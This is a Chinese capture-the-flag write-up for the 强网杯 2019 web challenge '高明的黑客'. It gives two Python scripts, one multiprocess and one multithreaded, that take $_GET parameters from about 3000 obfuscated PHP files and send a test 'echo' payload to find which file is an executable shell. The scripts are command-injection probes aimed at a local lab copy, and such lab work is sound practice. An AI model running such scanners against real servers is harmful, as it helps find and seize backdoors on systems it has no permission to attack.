[强网杯 2019]高明的黑客

提示有源码泄露

下载下来后，发现有3000多个文件，做了大量的混淆
推测其中有能执行的php文件

嫖一个一叶飘零大佬的脚本
大致思想是找出$_GET[]里边的参数，然后去执行，类似于$_GET['a'] = echo "sky cool"，如果回显中存在sky cool，则该shell能执行
15个进程，花了一个钟头跑出结果

import requests
from multiprocessing import Pool
import os

base_url = "http://localhost/www/src/"
base_dir = "www/src/"
# file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']


file_list = os.listdir(base_dir)


def extracts(f):
    gets = []
    with open(base_dir + f, 'r') as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET['") > 0:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)
                gets.append(line[start_pos:end_pos])

    return gets


def exp(start, end):
    for i in range(start, end):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s" % filename
        for get in gets:
            now_url = "%s%s?%s=%s" % (base_url, filename, get, 'echo "sky cool";')
            r = requests.get(now_url)
            if 'sky cool' in r.content:
                print now_url
                break
    print "%s~%s not found!" % (start, end)


def main():
    try:
        pool = Pool(processes=15)  # set the processes max number 3
        for i in range(0, len(file_list), len(file_list) / 15):
            pool.apply_async(exp, (i, i + len(file_list) / 15 ,))
        pool.close()
        pool.join()
    except:
        print "no"


if __name__ == "__main__":
    main()

大佬用的多进程，我自己尝试使用多线程，开30个线程跑

# coding:utf-8
import requests
import os
import threading
import time

base_url = "http://localhost/www/src/"
base_dir = "www/src/"
# file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']


file_list = os.listdir(base_dir)


class GetShell(threading.Thread):
    def __init__(self, begin, end, base_url, base_dir, file_list):
        threading.Thread.__init__(self)  
        self.begin = begin
        self.end = end
        self.file_list = file_list
        self.base_dir = base_dir
        self.base_url = base_url

    def run(self):

        for i in range(self.begin, self.end):
            filename = self.file_list[i]
            gets = []
            with open(self.base_dir + filename, 'r') as f:
                lines = f.readlines()
                lines = [i.strip() for i in lines]
                for line in lines:

                    if line.find("$_GET['") > 0:
                        begin_pos = line.find("$_GET['") + len("$_GET['")
                        end_pos = line.find("'", begin_pos)
                        gets.append(line[begin_pos:end_pos])

            print "try: %s" % filename
            for get in gets:
                now_url = "%s%s?%s=%s" % (self.base_url, filename, get, 'echo "sky cool";')
                r = requests.get(now_url)
                if 'sky cool' in r.content:
                    print now_url
                    break
        print "%s~%s not found!" % (self.begin, self.end)


threads = []
thread_count = 30
for i in range(thread_count):
    threads.append(
        GetShell(i*(len(file_list)/thread_count),(i+1)*(len(file_list)/thread_count), base_url, base_dir,
                 file_list))

for t in threads:
    t.start()
for t in threads:
    t.join()

花了一个半钟头

执行一下

获取flag

参考
https://skysec.top/2019/05/25/2019-强网杯online-Web-Writeup/#高明的黑客